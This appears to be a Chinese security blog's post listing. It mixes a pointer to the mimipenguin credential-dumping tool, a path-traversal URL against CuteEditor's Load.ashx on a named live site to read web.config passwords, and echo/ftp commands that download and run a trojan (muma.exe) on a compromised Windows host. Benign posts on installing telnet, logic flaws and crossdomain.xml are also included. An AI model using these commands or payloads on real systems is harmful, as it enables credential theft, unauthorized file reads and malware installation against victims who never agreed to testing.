发表于 | 分类于

项目地址

1
https://github.com/huntergregal/mimipenguin

使用实例
注意:需要root权限

以下环境测试通过
Kali 4.3.0 (rolling) x64 (gdm3)
Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
Ubuntu Desktop 16.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2)
XUbuntu Desktop 16.04 x64 (Gnome Keyring 3.18.3-0ubuntu2)
VSFTPd 3.0.3-8+b1 (Active FTP client connections)
Apache2 2.4.25-3 (Active/Old HTTP BASIC AUTH Sessions)
openssh-server 1:7.3p1-1 (Active SSH connections sudo usage)
测试Centos7无法抓取密码。

原文地址:http://www.freebuf.com/sectool/131165.html

发表于 | 分类于

漏洞描述

CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得Asp.net在线编辑器。 CuteEditor可以帮助Asp.net开发者轻松的对原来文本框(Textarea)中的内容(包括文字、图片等Html内容)进行编辑,更重要得是这些内容编辑的实现是所见即所得方式。 CuteEditor还集成了文件(包括图片、文档等)上传、媒体(包括视频、声音等)文件直接插入等对你来说非常实用的功能模块。但是在 Load.ashx 文件中,未对 file 参数进行处理,可以加载任意文件。

利用方法

http://www.woyigui.cn/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
使用该方法,读取应用系统中,包含数据库连接密码的文件,从而进一步渗透。

发表于 | 分类于

如果能够执行远程计算机的系统命令,并且我们有一台FTP服务器,可以使用如下的方法下载FTP木马到远程计算机执行。
在远程服务器上依次执行如下命令,将在C:\Windows\temp目录下,创建a.txt的文件。

1
2
3
4
5
6
echo open ip地址 >> a.txt 
echo 123 >> a.txt 
echo 123 >> a.txt 
echo bin >> a.txt 
echo get muma.exe 
echo bye >> a.txt

注释如下:
登陆FTP服务器
用户名
密码
开始
下载灰鸽子木马
关闭FTP服务器

现在我们在远程计算机上执行下面的命令:
ftp -s:c:\a.txt,意思是,读取a.txt里的参数,执行ftp命令,命令执行完后,木马文件muma.exe就下载到远程计算机里了,然后执行木马文件即可。

发表于 | 分类于

错误提示:

1
'telnet' is not recognized as an internal or external command

报错原因:
在Win7, Vista, Windows Server 2008 R2上, telnet不是默认安装的,手动安装既可以解决问题。
解决方案:
1.点击Start->Control Panel->Programs;
2.Turn Windows Features on or off;
3.在列表中, 向下滚动, 选择Telnet Client;
4.点击OK, 开始安装.

发表于 | 分类于

业务逻辑漏洞的定义

业务逻辑漏洞是指由于程序逻辑不严谨或逻辑太复杂,导致一些逻辑分支不能正常处理或处理错误。通俗地讲:一个系统的功能太多后,程序开发人员就难以思考全面,对某些地方可能有遗漏,或者未能正常处理,从而导致逻辑漏洞。逻辑漏洞也可以说是程序开发人员的思路错误、程序开发人员的逻辑存在漏洞。

阅读全文 »

发表于 | 分类于

漏洞描述

crossdomain.xml 是一个策略文件,定义 Web 页面资源是否能从不同域的 Flash 应用程序进行访问。当 Web 站点的 crossdomain.xml 策略太宽容(例如,允许任何域的 Flash 文件访问站点资源)时,可能会导致“跨站点伪造请求”或“跨站点跟踪”(“跨站点脚本编制”的变体)之类的攻击。

阅读全文 »